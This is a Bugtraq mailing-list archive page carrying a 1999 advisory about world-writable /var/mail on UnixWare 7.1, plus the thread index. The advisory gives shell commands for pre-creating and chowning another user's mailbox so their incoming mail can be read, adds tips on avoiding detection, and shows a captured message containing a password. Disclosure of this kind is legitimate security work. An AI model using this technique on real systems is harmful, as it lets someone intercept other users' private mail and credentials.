Bugtraq mailing list archives
UnixWare read/modify users' mail
From: btellier () USA NET (Brock Tellier)
Date: Fri, 3 Dec 1999 21:03:43 MST
Greetings, OVERVIEW Any user can read/modify others' mail. BACKGROUND Only UnixWare 7.1 was tested. DETAILS Imagine my suprise when I saw that /var/mail was mode 777. As such, any user may create a file called /var/mail/<username> with a mode readable by him and trap all incoming mail. Afraid of getting caught? chown the file to <username> (see my advisory on this subject), leaving it still world-readable, and no one will ever know who did it. All of this assumes, of course, that the user has not recieved any mail yet. If you keep track of your /etc/passwd file, you can monitor for new entries and create the files as needed. This permissions problem obviously opens the door for all sorts of problems with symlinks and such. I would imagine that some mail delivery programs which aren't as smart as sendmail will follow symlinks in /var/mail. And as if all this wasn't bad enough, UnixWare's /usr/bin/mail is a BIG LIE: bash-2.02$ cat /usr/bin/mail #!/bin/sh cat > /dev/null exit 0 bash-2.02$ ;) EXPLOIT bash-2.02$ id uid=106(xnec) gid=1(other) bash-2.02$ pwd /var/mail bash-2.02$ touch btellier bash-2.02$ chown btellier btellier bash-2.02$ ls -la btellier -rw-r--r-- 1 btellier other 0 Dec 4 07:54 btellier Now wait for btellier to get some mail... bash-2.02$ ls -la btellier -rw-r--r-- 1 btellier other 410 Dec 4 07:55 btellier bash-2.02$ cat btellier
Fromroot Sat Dec 4 07:55:29 1999
Return-Path: root Received: (from root@localhost) by localhost (8.8.7/UW7.1.0) id HAA04842 for btellier; Sat, 4 Dec 1999 07:55:29 -0600 (CST) Date: Sat, 4 Dec 1999 07:55:29 -0600 (CST) From: root@localhost Message-Id: <199912041355.HAA04842@localhost> Status: X-Status: X-SCO-PAD: XXXXXX X-SCO-UID: 1 Content-Length: 52 your ueber-secure password on 0wned.com is a@f9;se0 bash-2.02$ Brock Tellier UNIX Systems Administrator Chicago, IL, USA btellier () usa net ____________________________________________________________________ Get free email and a permanent address at http://www.netaddress.com/?N=1
Current thread:
- HP Secure Web Console Jon Mitchell (Dec 01)
- Re: HP Secure Web Console Alec Kosky (Dec 01)
- Re: HP Secure Web Console Keith Rice (Dec 02)
- Re: HP Secure Web Console GNSS Research Division (Dec 03)
- Re: HP Secure Web Console GNSS Research Division (Dec 03)
- UnixWare gain root with non-su/gid binaries Brock Tellier (Dec 03)
- UnixWare read/modify users' mail Brock Tellier (Dec 03)
- UnixWare and the dacread permission Brock Tellier (Dec 03)
- Apologies for wierd email Brock Tellier (Dec 05)
- Re: HP Secure Web Console Keith Rice (Dec 02)
- Re: HP Secure Web Console David Zverina (Dec 02)
- Re: HP Secure Web Console Alec Kosky (Dec 01)
- <Possible follow-ups>
- Re: HP Secure Web Console Mark Gross DSO (Dec 01)
- Re: HP Secure Web Console Randal L. Schwartz (Dec 06)
- Re: HP Secure Web Console Thillmann, Rolf (Dec 28)